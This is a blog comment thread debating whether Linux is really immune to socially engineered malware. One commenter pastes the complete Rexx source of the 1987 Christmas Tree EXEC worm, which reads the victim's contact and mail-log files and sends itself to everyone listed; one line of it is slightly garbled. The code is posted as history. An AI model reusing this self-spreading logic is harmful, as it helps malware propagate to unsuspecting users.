The reason a linux virus isn’t going to be very effective, even if you find a good hack, is because most linux users send and receive most of their communications to and from non-linux systems. Windows viruses spread so readily because anyone with a windows system is communicating constantly and frequently with many other windows systems.
Nice post thanks.
Flame bait written by a moron who doesn’t know what a virus is.
...
I did like his little appendix on root escalation via patience.
Macs, by the way, are also vulnerable to the attack described. However, there is one additional level of protection: You get a warning the first time you run something downloaded from the internet. You can ignore it of course, but you do get the warning. Social engineering, remember.
The more things change, the more they stay the same. One of the original computer worms was the famous Christmas Tree EXEC of 1987, which shut down IBM's internal network by flooding it with traffic. It was written in Rexx, not bash/Python, but, like what the article describes, it depended on social engineering. It was sent to victims using the system's email facility. When a user chose to run it, it would draw a cute Christmas tree on the 3270 display and then send itself to everybody in the user's contact list.
Here's the code:
/*********************/
/* LET THIS EXEC */
/* */
/* RUN */
/* */
/* AND */
/* */
/* ENJOY */
/* */
/* YOURSELF! */
/*********************/
'VMFCLEAR'
SAY ' * '
SAY ' * '
SAY ' *** '
SAY ' ***** '
SAY ' ******* '
SAY ' ********* '
SAY ' ************* A'
SAY ' ******* '
SAY ' *********** VERY'
SAY ' *************** '
SAY ' ******************* HAPPY'
SAY ' *********** '
SAY ' *************** CHRISTMAS'
SAY ' ******************* '
SAY ' *********************** AND MY'
SAY ' *************** '
SAY ' ******************* BEST WISHES'
SAY ' *********************** '
SAY ' *************************** FOR THE NEXT'
SAY ' ****** '
SAY ' ****** YEAR'
SAY ' ****** '
/* browsing this file is no fun at all
just type CHRISTMAS from cms */
dropbuf
makebuf
"q t (stack"
pull d1 d2 d3 d4 d5 dat
pull zeile
jeah = substr(dat,7,2)
tack = substr(dat,4,2)
mohn = substr(dat,1,2)
if jeah <= 88 then do
if mohn <2 ] mohn = 12 then do
DROPBUF
MAKEBUF
"IDENTIFY ( FIFO"
PULL WER VON WO IST REST
DROPBUF
MAKEBUF
"EXECIO * DISKR " WER " NAMES A (FIFO"
DO WHILE QUEUED() > 0
PULL NICK NAME ORT
NAM = INDEX(NAME,'.')+1
IF NAM > 0 THEN DO
NAME = SUBSTR(NAME,NAM)
END
NAM = INDEX(ORT,'.')+1
IF NAM > 0 THEN DO
ORT = SUBSTR(ORT,NAM)
END
IF LENGTH(NAME)>0 THEN DO
IF LENGTH(ORT) = 0 THEN DO
ORT = WO
END
if name ^= "RELAY" then do
"SF CHRISTMAS EXEC A " NAME " AT " ORT " (ack"
end
END
END
DROPBUF
MAKEBUF
ANZ = 1
"EXECIO * DISKR " WER " NETLOG A (FIFO"
DO WHILE QUEUED() > 0
PULL KIND FN FT FM ACT FROM ID AT NODE REST
IF ACT = 'SENT' THEN DO
IF ANZ = 1 THEN DO
OK.ANZ = ID
END
IF ANZ > 1 THEN DO
OK.ANZ = ID
NIXIS = 0
DO I = 1 TO ANZ-1
IF OK.I = ID THEN DO
NIXIS = 1
END
END
END
ANZ = ANZ + 1
IF NIXIS = 0 THEN DO
"SF CHRISTMAS EXEC A " ID " AT " NODE " (ack"
END
END
END
DROPBUF
END
end
end
This is describing a trojan, not a virus..
The entire premise of this article is predicated upon the assumption that the user takes some stupid action (like executing an attachment from an email).
The problem with Windows has always been more than just stupid user actions. Windows has been vulnerable to viruses, worms, trojans, malware, etc, without the user taking any stupid actions at all.
bkmk
“Therefore, we are told, the very architecture of Linux is so much more superior to Windows that it’s just not possible to successfully spread malware. Of course – it is acknowledged – a low-level bug, a buffer overflow or other issue is exploitable. But nevertheless, users can’t just catch a virus by email or downloading malware from the Internet, contrary to “those Windows users”. Linux will protect them from their own stupidity.”
What a huge straw man... There is a difference between ‘imposible’ and ‘more difficult’ which this article totally ignores.